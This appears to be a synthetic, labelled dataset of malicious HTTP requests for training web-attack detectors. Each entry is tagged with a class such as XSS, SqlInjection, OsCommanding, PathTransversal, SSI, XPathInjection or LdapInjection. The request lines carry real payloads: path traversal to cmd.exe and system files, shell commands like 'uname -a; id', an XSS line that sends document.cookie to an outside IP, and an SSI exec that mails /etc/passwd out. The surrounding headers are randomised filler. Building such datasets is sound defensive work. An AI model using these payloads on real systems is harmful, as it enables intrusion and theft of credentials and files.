If-Modified-Since: Mon, 19 Sep 05 05:53:20 GMT
If-Unmodified-Since: Sat, 01 May 10 08:27:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 57
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM VGxycmhjbG53cjdsc0Z0aWVuaGl0bmVib2lhZWk3U2ljYXZ4bnNpb2JybG0=
Authorization: ut2ox dtgbj=visno
Range: 1630-9,-816
Referer: http://teaaie3t.cz/8mejt/8rapl/nbue/Gosnn.mp3
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/3.6 (compatible; MSIE 6.6; Solaris; tLqTuvoa; etued; d0eeInuuhl)
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7064x6561
Via: 3.7 18.162.215.2, tNl/9.7 www.Htal.htm:9
Transfer-Encoding: identity
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44270
Start - Id: 36625
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.tTntuu.com
Connection: close
Accept: */*;q=0.8
Accept-Charset: cp-950;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=841
Client-ip: 107.48.3.140
Cookie: httpsDan=t
Cookie2: $Version="2"
Date: Thu, 28 May 09 03:15:40 UTC
ETag: "zWK@khPcwyjwc74KjL"
Expect: 100-continue
From: safieadn@TokeCnm8Oe.org
If-Modified-Since: Tue, 27 Apr 10 16:28:36 GMT
If-Unmodified-Since: Wed, 28 Jul 04 19:39:57 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 11 Nov 09 09:05:03 GMT
Max-Forwards: 280
MIME-Version: 2.7
Pragma: aastt='ryrw'
Proxy-Authorization: Digest qop=auth-int
Authorization: tDus rndeoby=anuya
Range: -8,4-,75-7
Referer: http://md3aamo.net/tpee.exe
TE: gzip
Trailer: TE
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 3.6; lE-ln; rv:3.3.3) Gecko/10029886
UA-CPU: StrongARM
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: cetahi/2.2 102.63.138.220, 5.4 www.lTveiTt.gif, aOAE/2.1 www.Aiieouo.jpeg:5
Transfer-Encoding: compress
Upgrade: aDote/0.4, nnlrf/4.3, ecsEa/7.5
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36625
Start - Id: 48139
class: XSS
GET /mW/i7mXFfn/t3HlMTeAruLrkveQZ-/nAMxGpPhkR/7e/nW7t/aat2qd829aarc/hzbt/dUPbTIQ08jAdSVda.asmx?BhelooVhlkoga=t8++++%22+++++++++style%3Dleft%3Aexpression%28alert++++%28%22+casq.qb+%22%29%29+++alt%3D%22 HTTP/1.0
Host: www.ehtnri.uk
Connection: close
Accept: */*
Accept-Charset: cp-932, windows-1252, iso-2022-jp, windows-1255, utf-7;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 34.160.166.92
Cookie: e2vlasnHj= C;ni=z taqlh7hmnh
Cookie2: $Version="98"
Date: Sun, 24 Jun 07 03:01:14 CET
ETag: W/"dP0f@L8t3uYSaQ2"
Expect: fh2IAlI=egbfsrrd
From: terhoe3@ygfzae.st
If-Modified-Since: Mon, 03 Sep 07 02:10:43 GMT
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: *
If-None-Match: *
If-Range: "_sQzlgpRyjqlMrtJz"
Max-Forwards: 01
MIME-Version: 8.0
Pragma: yv=edweu
Proxy-Authorization: Digest realm
Authorization: Digest qop=dtNle
Range: 4-,0-614
Referer: http://www.jsenEh0R.gov/krno/tolan/eEnzmlsh.swf
TE: trailers,deflate;q=0.1,trailers
Trailer: Trailer
User-Agent: E75m6ml (9kROpXKq@; iTfvwoRR_Q; teGNyYxf; eMapVJV; sUkKWWrp)
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8071x836
Via: FTP/3.2 www.ohdudahd.jpg
Transfer-Encoding: identity
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 452 www.beld.html "tgngho80ui" "Tue, 29 Jun 04 10:36:42 GMT"
X-Forwarded-For: 112.65.225.240
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48139
Start - Id: 41664
class: SqlInjection
GET /omiIhnkepRrats/ginsertR@45R_@KWZ/nemi.bin?wazhrenh=33181160&tleonseahf=%27++%2B+++%28+++++SELECT+TOP+++++1+ciOoHh+FROM++lmtra8m%29+++%2B+++%27&VbXTRCvRu=vtsdwgrni3baR35&o2e2ob=t%40_nT&Oac3=8311&nehteulhtv=h6rea&bm=rbnvk&ieoeSs=i5Q02lw&ie=O5slalisystem+%24enull&i1aqoi=nz&bhucjeod=53915&rnrv=0 HTTP/1.0
Host: www.diwp.ch:94
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: compress
Accept-Language: sa8-5EeteIcu;q=0.5, 3nOrt-eCaqw, aocott8p-ncie4iat;q=0.8
Cache-Control: nfi='rfH'
Client-ip: 239.57.78.114
Cookie: dns=5769863
Cookie2: $Version="29"
Date: Fri, 18 Nov 05 06:22:12 UTC
ETag: "FH8-9ZBlEp69RKFe"
Expect: tdqm
From: xwDNo@mseaaa.st
If-Modified-Since: Wed, 31 Mar 10 02:20:40 UTC
If-Unmodified-Since: Sat, 03 Oct 09 09:29:46 UTC
If-Match: "FpaGPrOX@3kBu7hzI"
If-None-Match: "iPWt3SVefv-fKlN"
If-Range: Sat, 14 Jul 07 19:51:17 GMT
Max-Forwards: 750
MIME-Version: 3.1
Pragma: Ao6rrxo='qal7o8t'
Proxy-Authorization: ewnBd ycpeari1=oiYepi
Authorization: aeahet ereorr=eaclTwr
Range: 8646-84,-596087,4-03835
Referer: http://www.rhat.fr/vsesnaz/n3ii/Trkrn.pdf
TE: trailers,deflate;q=0.7
Trailer: If-Range
User-Agent: ntddgotah/5.5.7.0.9
UA-CPU: MIPS
UA-Disp: 4417,837,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: 4.7 www.mref.jpeg, 6.5 www.rlnm.css
Transfer-Encoding: compress
Upgrade: btae/4.5, tttO/9.7, eOni/0.4, osssa/2.4, rdi/6.6
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41664
Start - Id: 46425
class: PathTransversal
GET /i@XGJQI6CqmO/plMRu/ahnYs/pumneotien3mkk/srle4tx2c/9execwgetX50accept2Pinclude_A9F/ob4g2xZLG/tbqZIH8@H-sAyZ/scriptI5ugAX/gPwTl.mspx?2aucseweo=js19tsucxoiemt&uepqnk3js8WOar=fgedp1s&Tqx6mbIinseRr=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion HTTP/1.1
Host: 132.117.244.12
Connection: Nntree
Accept: */*
Accept-Charset: macintosh;q=0.7, iso-8859-2;q=0.2, iso-8859-3, big5;q=0.2, cp-950
Accept-Encoding: 
Accept-Language: ohs-stnei, fancsd-nn, aso4T-lipy, tef-24ihdh;q=0.5, e-eNrvrAe;q=0.9
Cache-Control: no-store
Client-ip: 124.211.79.221
Cookie: uy=r2vIA;frdth=em;yLVbmmail07=6;c5bzb@httpo7=wdtfIAswonrdsdnace;7hdnsm=je0;@NconnectExBF=KooiaLh
Cookie2: $Version="5"
Date: Wed, 27 Sep 06 20:20:23 GMT
ETag: "IY66ek_V0ngLo.jtW5A"
Expect: rgnRrl
If-Modified-Since: Sat, 08 Apr 06 17:45:11 GMT
If-Unmodified-Since: Fri, 31 Jul 09 05:31:36 CET
If-Match: "7KS@DlwmcXx@arGlvAuv"
If-None-Match: *
If-Range: "oY.MRtACTt1v6CSmHV"
Max-Forwards: 528
MIME-Version: 3.3
Pragma: pes='Jgt1rt'
Proxy-Authorization: Digest nonce
Authorization: NTLM ZW1laWhUYnNzRTJmZXB3c250aWV3c3NleXd6a2JwOHN3OW9ncw==
Range: 3341-,1-,7-
Referer: /d4nyt0u/e3egmm/iaersteo/bo6hr/Att5wi.js
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/8.3 (X11; U; SunOS sun4u 9.7; bt-dk; rv:8.2.5) Gecko/23854990
UA-CPU: x86
UA-Disp: 5419,5549,32
UA-OS: FreeBSD
Via: 8.9 172.201.127.252, HTTP/7.0 www.hpeas2.tiff, HTTP/4.4 220.13.161.171:94352
Transfer-Encoding: identity
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 223 232.197.120.51 "npays3" "Wed, 14 Jun 06 02:27:53 UTC"
X-Forwarded-For: 242.103.195.112
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46425
Start - Id: 46809
class: XSS
PUT /chC@ey3CD2WEQ/CdzlBI-Stelnet/hbGrSfssaajltr/iq_xLZ0lSSLsN0iZ8/tyQvE/HeE/lz5dshm1otnzoaelAomS/Q7Q8httpsallWJ4/erd77aozs2wcEt7/fd8.jpg? HTTP/1.0
Content-Length: 361
Content-Language: iueaa,7,ato6
Content-Encoding: identity
Content-Location: http://www.spaas5a.net/A308c6/htr7fs/detlists.mp3
Content-MD5: Ym56c294bnNhaHM1bGZpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Mar 06 19:14:33 CET
Last-Modified: Wed, 21 Dec 05 20:04:04 GMT
Host: 176.10.156.114
Connection: tenM
Accept: application/postscript, text/*, audio/basic;q=0.6
Accept-Charset: iso-2022-kr;q=0.2, windows-1255, windows-1254;q=0.3, iso-2022-jp;q=0.3, x-mac-greek
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 180.151.251.196
Cookie: samopenls6Kbinzi=vHueqLhT;Raetkice=e-7fGi;it6e=n1s4ubll
Cookie2: $Version="66"
Date: Sat, 06 Jun 09 12:08:52 CET
ETag: "y@tKjzaOGXeONi4MFD"
Expect: crttsci=ei2cr
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Wed, 05 Apr 06 20:41:27 GMT
If-Unmodified-Since: Thu, 15 Oct 09 14:28:36 GMT
If-Match: "MEGrXqwucpum@xi9idO5"
If-None-Match: "QrGLECH423pat1DHX@"
If-Range: Tue, 04 Jan 05 02:15:48 UTC
Max-Forwards: 1871
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: oand kioW=rs9ay
Authorization: Basic NFZzTnl2Om5vb2Q=
Range: 175390-78,55-,908690-
Referer: /eTdttp/osew/c9asea/lattsgon.css
TE: trailers,trailers,trailers
Trailer: Host
User-Agent: Mozilla/1.9 (Machintosh; U; PPC 0.1; se-r5; rv:3.6.3) Gecko/93165013
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 2.3 www.anzI.shtml
Transfer-Encoding: identity
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 793 241.179.195.131 "halAIevnm" "Wed, 27 Apr 05 17:07:05 CET"
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

een2Eai=rYXIGj&azearpW=08&oie=nfnm&0sock_streamstyleXSxnco_=zxrT&BYqCpassthrul=tCLihntro4nSTis&qinclude7sIZJZ-C=<img     dynsrc=   "javascript:[window.open('http://100.43.114.218/ve.swf'+document.cookie);]     "   >&htteu1im2Ses=ejk5V&a5ittnOouabosa=356002&qn7=f1k9fei&@scgobject8kp0=st4rmPVsxHHe&0nAqrth=h8x@&nutne8l=28581

End - Id: 46809
Start - Id: 39418
class: SSI
GET /zkSMhtaccesPXg/g1G/vg0aDfbza4sx/u5@wqwj2RFPhBUg/0KKhXReHylPZz5JVSL.js?@W3NpNOhformsgD=5%3Ebc4rardpm%24%40gceexec&hlaOei=%3C%21--%23email+fromhost%3D%22www.DnAndae.com%22+tohost%3D%22mailbox.sSr.com%22+message%3D%22r32hn+biwter+oUb+sts%22+fromaddress%3D%22meIyut.com%22+toaddress%3D%22ozls2.EyI0.com%22+subject%3D%22eag%22+sender%3D%22h91s.com%22+replyto%3D%22deAqa.com%22+cc%3D%22looe%22+inreplyto%3D%22xie+wnca+eeh%22+id%3D%22anrmail%22+--%3E HTTP/1.0
Host: www.hhsdwe.net:80
Connection: pt0sseg6
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 86.180.99.8
Cookie: ngtnsC=t;dcslrmourmfybhi=vm;nfUws=difoatdeonsiasA;LG5bWKsmJZt=d5nmS4eN7OW;4uxT=ht&@se 
Cookie2: $Version="2"
Date: Wed, 23 Feb 05 10:38:47 UTC
ETag: W/"EqD@suDSZ-6kzkU3OMMy"
Expect: 100-continue
If-Modified-Since: Fri, 10 Mar 06 20:56:58 CET
If-Unmodified-Since: Sun, 29 Nov 09 06:38:45 UTC
If-Match: *
If-None-Match: "sGRfe6R-RBCty.SHb"
If-Range: *
Max-Forwards: 6703
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM TnN0dGVxMXJlaHFlYWFwYXdNUmxydGptb2F0dHRzYXN5
Authorization: Basic ZXk5ZW86b3lhb3J1
Range: 02-,96-
Referer: http://www.eetSm.cz/Temjgbo.swf
TE: gzip,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.0 (X11; U; Linux i586 5.9; 7A-fg; rv:8.5.4) Gecko/98146661
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4162x972
Via: FTP/6.2 www.ptre4acH.html, 6.4 173.149.224.86
Transfer-Encoding: gzip
Warning: 911 148.86.166.125:8448 "aOi1" 
X-Serial-Number: 599135486061
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 39418
Start - Id: 48376
class: XPathInjection
GET /usVnantoja/73meGhpehlgcu1/bNWglzTFH4rbJlyu3oel/rb-vze/a.m.@euaN/ybw5-H5/eexeclWm-QOlIDyI@V/eoVDxeedmiv/nfieh/frmdtst/KTand/jCPC.php?rsnedzsOoss=e HTTP/1.0
Host: 192.179.176.174:8943
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 05835    or    1<   sd/tof/hcf/child::text()[position()=683]   or     37='] | /* | /foo[bar='
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 34.130.231.33
Cookie2: $Version="9"
Date: Sat, 23 Dec 06 21:59:57 UTC
ETag: W/"R3jwvlpSyvKD@X3"
Expect: ijeil
From: rnjltn@certi8ho.ch
If-Modified-Since: Mon, 16 Feb 04 06:12:12 CET
If-Range: Wed, 26 May 04 06:37:44 GMT
Max-Forwards: 78
Pragma: Shnuzai='gonhTns'
Proxy-Authorization: Digest username="aOiaWnc"
Authorization: Digest response="ff33156a4A1965768A0b720f600CAFC4"
Referer: http://iaii.uk/hoti3Biv/hihilVon/hfet/4ioc9o6c/11dsvm.cfm
TE: trailers
Trailer: Date
User-Agent: Mozilla/1.1 (X11; U; Unix 0.1; to-ns; rv:7.7.2) Gecko/37078946
UA-Disp: 373,940,32
UA-Pixels: 9943x7757
Via: 9.8 55.70.129.253, 0.1 25.217.218.162:5, 3.9 218.254.244.64
Transfer-Encoding: compress
Upgrade: sth/0.2
Warning: 207 51.200.199.142 "cdmsHtrstOtieyeEsd" 
X-Serial-Number: 63375075404459251

null

End - Id: 48376
Start - Id: 36215
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: www.6kBdrnlb.ch
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: lcnedp-h1oaehhe, etaO-32i, Ocgcteo-oa2lzhe;q=0.8
Cache-Control: only-if-cached
Client-ip: 57.19.106.255
Cookie: coeiuaSo=cirjmjD9gzfw;f6=HhtaccesmT%]lib~l(tbE;Lh9P0aZJi=219391923;nasNdhnrsa=3:roI
Cookie2: $Version="46"
Date: Tue, 13 Nov 07 06:20:50 UTC
ETag: W/"61@XYEowE14r6d8"
Expect: e86z=ehdsOdp;uenhi1
From: aesn@tdnix0ah2.ch
If-Modified-Since: Sun, 20 Jun 04 18:13:48 CET
If-Match: *
If-None-Match: *
If-Range: "kg4aiHskEb@3r3EtOx"
Max-Forwards: 58
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM bnBhSG9heGkzaGxvZUVvN293Y3o2ZW1ocEVyaHRheW90dG4xdGVlaXBMNHQ=
Range: 183-
Referer: /21nt.cfm
TE: trailers
Trailer: Accept-Language
User-Agent: ntnld0Ssh5/3.9
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Win98
Via: 5.8 110.84.189.241, HTTP/9.2 1.12.74.59
Transfer-Encoding: deflate
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Serial-Number: 003494109
----: -------------------------------

null

End - Id: 36215
Start - Id: 40066
class: SSI
GET /i8y1es/nW1Mb4mbyMrh/dq-rY@pNC4rtJ1X2Z/3nrg/sDyOvazC@Xr/zsq6jiOh/txrhrcCtoglqnnlTvhnr/ri/esLB/oV3HfQWfoHVn35Jzpv/sgTGlQDZ.aspx?lsnd=1072&slTnrj9n=32348955&iSts=t&hruo7e=eThj65WeuU&rentehut=xdwsystem0&QahpZwhere=T%3Bnhsistyle%3A%5Dun%27&eToar=%3Ceaks&etptg6m2shlA=yS0&9eaisa=%3C%21--+%23exec+cmd%3D%22%2Fbin%2Fmail+ehuit6d.com+++++%3C+++%2Fetc%2Fpasswd%22--%3E&asCdlhozsahRom=3&7R=n7S6T0 HTTP/1.0
Host: 193.254.134.251
Connection: EaEadduT
Accept: application/*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 159.72.147.40
Cookie: Thhouno=w0ianhee0edllro;fHuga9anbjzic=u;lfaeccodcpAt=d9oenxdrofee9rns;93R=/>ldvar Ne;3Euasetv3i=lJNCioogwlnadymte
Cookie2: $Version="530"
Date: Sun, 27 Feb 05 01:03:41 CET
ETag: W/"m822BdROxDnURNjxK_V."
Expect: 8eue=ieavl2du
From: uohepreO@9Mntu.biz
If-Modified-Since: Mon, 12 May 08 07:45:22 GMT
If-Unmodified-Since: Sun, 24 Jun 07 04:07:34 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Jan 10 12:21:52 GMT
Max-Forwards: 775
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: 4allo mtnma=nrn0a
Authorization: Digest uri=http://www.atrBt.uk/llTg/lmty/srosiRhd/mteu/4rRzRrnd.swf
Range: -34,965-6
Referer: /rjnmn/ebgMus5/51mte/atw4.asp
TE: gzip;q=0.4,trailers,deflate;q=0.0
Trailer: Via
User-Agent: Mozilla/1.1 (Windows; U; Windows NT 4.5; 5e-ea; rv:5.6.7) Gecko/02893541
UA-CPU: PowerPC
UA-Disp: 665,2462,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 893x680
Via: 3.8 40.37.223.23, fenf/3.4 www.v9eom.htm, 0.6 67.70.172.248
Transfer-Encoding: 3eheoi; ejeeao=ttrigO
Upgrade: ToKh/4.1, goe/9.9, moax/0.8
Warning: 911 www.ejut.htm:36 "cae6hwoklthpbe8t9y" "Wed, 10 Feb 10 10:50:49 GMT"
X-Forwarded-For: 149.177.156.143
X-Serial-Number: 827844806951903095
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40066
Start - Id: 49739
class: XPathInjection
GET /79Yuj/diar9dwionn/fQaH9qZ/eqQ/nph-Snaccess_logHpl2OoQYwp-/sIq/aiaetEmqdrmnkipt4nT/ho/TK_/tSeKNe9mx8cJcFzi.sh?ho=07&jajeEohgcle=664&2ntednHddjndmtu=etti%27++++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or+%27gtcnheo%27++++%3D++++%27&eid=tCQ97d&NVBpgstnchild@mrm=062&jM_2B33_=ts&dpgaestSvOlhmm=qi&clwitia9Fwfoar=rtwqat8mwinnts%7C HTTP/1.1
Host: www.Rxz0sydit.cz
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: identity, compress, gzip;q=0.7
Accept-Language: *;q=0.8
Cache-Control: min-fresh=0772
Client-ip: 24.134.122.55
Cookie: eeit8n=rood;cc=snBp2P6G;earatf=jJu;Nd=fxreplacehedlnadaotnea;XlERq=7AAe0az60s
Cookie2: $Version="05"
Date: Tue, 26 Oct 04 07:00:08 CET
ETag: "-Dc1ZeBRZlf3FwUe"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 25 Jul 04 06:35:32 GMT
If-Unmodified-Since: Mon, 17 Sep 07 19:33:54 CET
If-Match: "d8k9HmJhr--sF05v9"
If-None-Match: "-3FzpY@tOfQqwYOBqG"
If-Range: "l8UmGJBfikP0i.2"
Max-Forwards: 4
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic aXd5RWRhbmE6OHFuOGVuNGU=
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -37003,-5,-1
Referer: /dLutvp/4oSI0rEl/l6swEoot/pscoai.ace
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: gfVqydEY http://www.teseL5sc.com
UA-CPU: x86
UA-Disp: 3953,5444,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4653x522
Via: ilite/5.2 www.itraG.jpg, FTP/7.7 251.230.234.149, 0.3 122.141.69.88
Transfer-Encoding: gzip
Upgrade: rsmt7a/2.2, ysy/1.0
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49739
Start - Id: 43095
class: OsCommanding
GET /h_U-cNPhzIP3FE/nDTZ_8hCLxFQ.msf?wT16wozsevy=++%3B++++echo++%3B+++++w+++++%3B++++uname+++-a++%3B++++id HTTP/1.1
Host: www.o5iZbchi1.biz
Connection: close
Accept: */*;q=0.1
Accept-Charset: big5;q=0.5, euc-tw, x-mac-chinesetrad;q=0.1, iso-8859-5;q=0.6
Accept-Encoding: 
Accept-Language: kdo-ecgo7;q=0.4
Cache-Control: only-if-cached
Client-ip: 160.22.241.142
Cookie: giblArhete=18;ssetsi=822621;qfacniesrimjsg=stoes1'n\ore4yp;diebcit=oaRhiuwqisa;iuattydqe6rT=[ n1Ig
Cookie2: $Version="82"
Date: Wed, 08 Dec 04 04:43:28 UTC
ETag: W/"as5zU3TltwGEc-Ix0hc"
If-Modified-Since: Mon, 09 Jan 06 20:32:24 CET
If-Unmodified-Since: Tue, 30 Jun 09 14:40:19 UTC
If-Match: *
If-None-Match: "bThz1EV8KtvYztG-D4"
If-Range: *
Max-Forwards: 274
MIME-Version: 1.3
Pragma: no-cache
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: /rwariH5n/rcree/ea77/dnree/wena.png
TE: chunked;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.8 (Windows; U; Win98 5.6; of-ya; rv:7.7.7) Gecko/47056097
UA-OS: Mac OS X
Via: HTTP/2.1 www.5sonfb.png, FTP/8.3 188.35.128.161
Transfer-Encoding: deflate
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 212 www.htenLWg.shtml:97715 "ednatrortnk4" "Wed, 22 Apr 09 12:47:41 UTC"
X-Serial-Number: 306986025864028
----: ------------------------------------------------

null

End - Id: 43095
Start - Id: 35621
class: XPathInjection
GET /dh2YrcJPyBpKXvrCv9fM/gs/.@FCUZ/eO2p4pgi_00HCuOnY/SStda/osvqoB0letbhC6ropwr/tD4tjj_c5XKVh/q1eWlHreplacem5oselectPOlib.php3?hmSnI=n%3Ctsc&XOGyLTt=n5%2B&HPy9sunionJzwget=yd%25sf&9_6t=ShbweSjs%27+++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28+++i++%2B+j+%2Bk+%2B+++l+%2B+++1%29%5D++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+%27twcjh%27++%3D+++%27+++++Olsq%27+or&oeenetwd=btme&dTtAnqr-D=723552&xht=Ruc HTTP/1.1
Host: 24.168.242.204
Connection: eemlt
Accept: text/plain
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: A4i5-hEer
Cache-Control: no-cache
Client-ip: 141.183.120.32
Cookie: aAIna=nge4zi92NR@;iernismmils=377830;wnni9ehDsneoz=2RhK3hraBd;9echoeZKE.GAgq7=aIffoG$skl
Cookie2: $Version="65"
Date: Wed, 03 Mar 10 17:33:39 GMT
ETag: W/"xTHpvz5ahfoa5jv_KuRj"
Expect: arecso=imaEbd
From: eopr@Obgt7.be
If-Modified-Since: Fri, 20 Jul 07 03:01:23 GMT
If-Unmodified-Since: Wed, 07 Jan 09 23:29:38 UTC
If-Match: *
If-None-Match: "GYvZt0FQnsL2HkwjMVKZ"
If-Range: Fri, 23 Apr 04 22:46:36 UTC
Max-Forwards: 7
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic c3l0ZWVBdDI6YU5paXRm
Authorization: NTLM ZU9nYm9zdGUwdU1ib2VldG1yb2RpaWRkQ2RnZGxyTGlmdHJOQmFzdG50
Range: -827333,2893-
Referer: /ohhid/4eatelme.pl
TE: trailers
Trailer: Expect
User-Agent: Mozilla/5.5 (Windows; U; Win 9x 4.0; en-ei; rv:6.7.5) Gecko/45390161
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 817x128
Via: 7.4 4.92.172.173:6109
Transfer-Encoding: compress
Upgrade: sivn/3.0
Warning: 510 208.23.212.198:55713 "gsNb3nolnttct" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35621
Start - Id: 38860
class: LdapInjection
GET /aANPKsrIC.9.exe?1UXpWfrom8=hrh&dyeiorSTRce2he=0&0npdcdmeh=hemd&edeaNcdpya=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&J8t339b=6&etna2lE=442255677&Ii0upudOe9iegev=53201 HTTP/1.1
Host: 182.1.141.144:80
Connection: close
Accept: application/*, audio/x-wav;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 8t-mtnats, v-b81n, s02ottdo-d5gue8Ea;q=0.4, Aua-qmhtno, tem-nsel;q=0.3
Cache-Control: no-store
Client-ip: 149.133.119.108
Cookie: athIggo=0;opIt2=sLsoa;ede=Bylnrcn8wser;mpokNesnmttt=79614918;ushtg=msUopassthru;siYy=u2og
Cookie2: $Version="90"
Date: Sun, 20 Jul 08 07:04:39 GMT
ETag: "bVKwugiMy5hN4Kvx_jnd"
Expect: t02I
From: tdusret@b5koNnc.biz
If-Modified-Since: Thu, 26 Jul 07 24:07:21 GMT
If-Unmodified-Since: Wed, 23 Jan 08 14:07:09 UTC
If-Match: *
If-None-Match: "-TK5-yCJjZAv.aKI7jV"
If-Range: *
Max-Forwards: 17
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic ZWxOdWE6b2VwZG53eQ==
Authorization: Digest opaque="xEati"
Range: 317-,-056
Referer: /Ow8hsdl/ysfe/3acoa/oxu1qsi3/hKraE.doc
TE: deflate
Trailer: Accept-Language
User-Agent: wiaTi/2.6.3.1
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 1.3 134.108.212.227:66709, FTP/1.6 105.255.212.120:074, HTTP/3.3 www.dEhdyr.css
Transfer-Encoding: gzip
Upgrade: tey/4.0, 12heee/5.9, ilc/0.2, rztl/8.5, cehnt/0.1
Warning: 172 228.33.193.154 "nienhhonlnuio8cmpet" "Sat, 12 Aug 06 02:08:19 GMT"
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38860
Start - Id: 44803
class: PathTransversal
